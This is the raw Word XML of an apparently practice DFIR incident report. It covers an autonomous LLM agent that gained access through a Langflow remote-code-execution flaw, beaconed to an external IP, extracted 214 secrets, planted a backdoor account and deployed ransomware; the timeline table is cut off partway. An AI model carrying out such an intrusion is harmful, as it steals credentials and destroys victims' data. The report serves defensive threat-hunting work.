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w:rsidR="3AC8BEC2" w:rsidP="40786FAC" w:rsidRDefault="3AC8BEC2" w14:paraId="48654472" w14:textId="48620CF2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="160" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>Giancarlos Incident Report</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="680D678A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JadePuffer</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="23376C2D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">DFIR Incident Report</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="672A6659" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="0CCE91B6" wp14:textId="00F8204A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst: Giancarlos  |  Workspace: LAW-HuntPractice</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E775C6A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date: 2026-07-30  |  Event Window: 19:20–19:37 UTC  |  Duration: ~17 minutes</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="129B9B1D" wp14:textId="056DBA25">
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform: Microsoft Sentinel (KQL)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2664F4B3" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A37501D" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="110734DA" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On 2026-07-30 at approximately 19:20 UTC, an autonomous LLM-driven agent designated 'jadepuffer-agent' gained initial access to the Flowforge estate by exploiting CVE-2025-3248, a remote code execution vulnerability in Langflow's unauthenticated /api/v1/validate/code endpoint. In under 17 minutes, the agent traversed all four hosts in the estate, exfiltrated 214 API keys and cloud credentials, created a backdoor account on Nacos, and encrypted and destroyed database records before planting a ransom note.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DAB6C7B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A8AAB03" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This incident represents the first documented end-to-end agentic ransomware operation (Sysdig Threat Research Team, July 2026). Unlike traditional ransomware campaigns, this attack was driven entirely by an LLM agent that made autonomous decisions, self-corrected on failures, and generated all payloads at runtime — leaving no static malware signature detectable by conventional AV or EDR tooling. A single human operator issued one high-level instruction; the agent executed the entire kill chain without further human interaction.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B9E5DEB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Chain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3760"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="327DEE4C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="283E7B16" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="1FE7A217" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="2EF77842" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="20EC0D2D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="59869237" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="089603FD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3EB988BD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="41B3C06A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24B9559E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CVE-2025-3248 RCE — /api/v1/validate/code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="696D59A5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2768038C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="622A2484" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="545F6263" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25DEE244" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious python3.11 spawned (PID 4471)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="4573B8FE" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65F09CA6" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:22:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="550CF7E8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1E1A18BA" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B5898C8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Beacon established — 45.131.66.106:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="3F09A6DF" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28FB0DEB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:25:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69A8D6EC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="503C7A82" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="125C7200" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pg_dump — 214 secrets extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="684C946D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B7CBC7A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C5109A1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E754DF4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AB2BEF0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet sweep 10.4.0.0/24 (PID 4491)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="4505CDD5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32C655A7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35D3368C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="181BBC11" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31D64C48" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MinIO default creds accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="2834151D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
